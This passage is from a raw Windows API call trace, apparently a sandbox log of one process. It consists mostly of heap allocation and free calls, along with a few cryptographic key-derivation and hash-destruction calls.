Flags=0x0, Size=0x4) returned 0x2e54d48 [0133.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0133.249] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0133.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0133.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0133.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0133.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0133.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0133.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0133.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0133.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0133.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0133.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0133.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0133.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0133.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0133.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0133.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0133.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0133.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0133.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0133.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0133.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0133.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0133.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0133.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0133.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0133.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0133.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0133.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0133.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0133.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0133.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0133.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0133.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0133.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0133.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0133.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e50b60 [0133.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50b60, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0133.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0133.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0133.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0133.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0133.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0133.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0133.320] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87310, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87610) returned 1 [0133.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0133.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0133.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0133.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0133.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0133.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0133.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0133.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0133.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0133.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0133.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0133.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0133.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0133.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0133.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0133.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0133.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0133.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0133.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0133.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0133.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0133.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0133.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0133.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0133.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0133.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0133.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0133.321] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0133.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0133.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0133.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0133.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0133.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0133.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0133.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0133.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0133.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0133.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0133.322] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0133.322] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0133.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0133.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0133.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0133.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0133.431] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0133.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0133.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0133.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0133.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0133.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0133.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0133.431] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0133.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0133.431] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0133.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0133.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0133.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0133.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0133.432] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0133.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0133.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0133.432] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0133.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0133.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0133.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0133.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0133.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0133.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0133.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0133.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0133.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0133.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0133.432] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0133.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0133.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0133.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0133.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0133.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0133.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0133.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0133.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0133.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0133.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69928, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0133.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0133.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0133.433] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0133.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0133.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0133.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0133.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0133.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0133.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0133.434] CryptDestroyHash (hHash=0xa87310) returned 1 [0133.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0133.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0133.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0133.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0133.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0133.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0133.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0133.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0133.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0133.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0133.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0133.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0133.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0133.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0133.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0133.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0133.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0133.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0133.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0133.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0133.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0133.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0133.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0133.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0133.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0133.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0133.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0133.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0133.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0133.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0133.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0133.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0133.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0133.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0133.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0133.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0133.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0133.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0133.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0133.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0133.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0133.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0133.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0133.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0133.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0133.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0133.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0133.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0133.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0133.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0133.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0133.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0133.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0133.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0133.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0133.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0133.436] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0133.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0133.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0133.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0133.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0133.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0133.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0133.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0133.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0133.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0133.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0133.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0133.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0133.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0133.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0133.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0133.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0133.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0133.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0133.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0133.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0133.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0133.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0133.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0133.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0133.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0133.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0133.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0133.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0133.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0133.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0133.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0133.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0133.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) 